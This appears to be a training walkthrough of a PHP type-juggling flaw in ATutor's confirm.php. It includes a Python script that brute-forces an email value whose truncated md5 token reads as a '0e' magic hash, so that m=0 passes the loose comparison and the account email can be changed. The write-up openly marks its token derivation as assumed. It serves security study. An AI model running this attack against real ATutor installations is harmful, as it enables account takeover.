In this section we will exploit the Type Juggling vulnerability in the ATutor application.
Let's start by locating the confirm.php file:
find /opt/lampp/htdocs/ATutor/ -type f -name confirm.php 2>/dev/null

Now let's look at the code.
As shown below, the code first checks for the presence of the "e", "id" and "m" parameters, then casts the value of "id" to an integer and trims the value of "e".

Then, as shown below, the code checks whether a matching member exists by fetching that member's creation date from the database.

From this code we can see that we control three variables:
id -> the unique id of the user whose record is looked up.
e -> the new email address to be set.
m -> the confirmation value that decides whether the email is updated; it is checked with PHP's loose comparison (==), and in PHP two numeric strings compared with == are compared by numeric value rather than byte by byte, which is what the next section builds on.
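The following is an added example, not ATutor's own code. It models PHP's loose comparison for two strings in Python, shows how a hex token of the form "0e" followed by digits compares equal to "0", and searches for an "e" value that produces such a token. The server-side derivation of the token (first 10 hex characters of md5(e . creation_date . id)) is an assumption made here for illustration and is not something the page confirms; replace expected_token with the real derivation once you have read it. The creation date and member id are constructed inputs; where the creation date is not known to the attacker it becomes another dimension of the search.

```python
"""Added example (not ATutor's code): model of the loose comparison on the
m parameter and a search for an e value that makes it pass.

ASSUMPTION (not stated on the page): the server derives its expected token as
the first 10 hex characters of md5(e . creation_date . id) and tests it with
PHP's == operator. The comparison semantics are what the technique relies on.
"""
import hashlib
import re

# PHP numeric-string grammar (PHP 8 also tolerates trailing whitespace).
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?\s*$")


def php_is_numeric(s: str) -> bool:
    """True if PHP would treat s as a numeric string."""
    return _PHP_NUMERIC.match(s) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP's == for two strings.

    Two numeric strings are compared by numeric value, so '0e12345678'
    (0 * 10**12345678) equals '0'. Anything else is a byte comparison.
    """
    if php_is_numeric(a) and php_is_numeric(b):
        return float(a) == float(b)
    return a == b


def expected_token(e: str, creation_date: str, member_id: int, prefix_len: int = 10) -> str:
    """ASSUMED stand-in for the server-side token derivation in confirm.php."""
    raw = f"{e}{creation_date}{member_id}".encode()
    return hashlib.md5(raw).hexdigest()[:prefix_len]


def is_magic(token: str) -> bool:
    """A hex token that PHP reads as the number 0, e.g. '0e' followed only by digits."""
    return php_is_numeric(token) and float(token) == 0.0


def find_magic_email(creation_date: str, member_id: int, domain: str = "example.com",
                     prefix_len: int = 10, max_tries: int = 2_000_000):
    """Try candidate e values until the derived token is magic.

    Returns (email, token) or None. With a 10-character prefix roughly one
    token in 11,000 is '0e' plus 8 digits, so this finishes in milliseconds;
    the full 32-character digest would need about (16/10)**22, roughly
    31,000 times, more attempts on average.
    """
    for n in range(max_tries):
        e = f"victim+{n}@{domain}"
        token = expected_token(e, creation_date, member_id, prefix_len)
        if is_magic(token):
            return e, token
    return None


def server_accepts(e: str, m: str, creation_date: str, member_id: int) -> bool:
    """The vulnerable check as modelled: loose comparison of the token and m."""
    return php_loose_eq(expected_token(e, creation_date, member_id), m)


if __name__ == "__main__":
    # Constructed values: a target member id and a creation date the attacker knows.
    CREATION_DATE = "2021-03-04 10:15:30"
    MEMBER_ID = 1
    email, token = find_magic_email(CREATION_DATE, MEMBER_ID)
    print(f"e={email} gives token {token}; sending m=0 passes: "
          f"{server_accepts(email, '0', CREATION_DATE, MEMBER_ID)}")
```

Because the attacker controls "e" and supplies "m", no real hash is needed for "m" at all: once a candidate "e" yields a "0e..." token, m=0 satisfies the check. The search is cheap only because the token is truncated; with the full digest the same approach is impractical.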

Magic Hashes.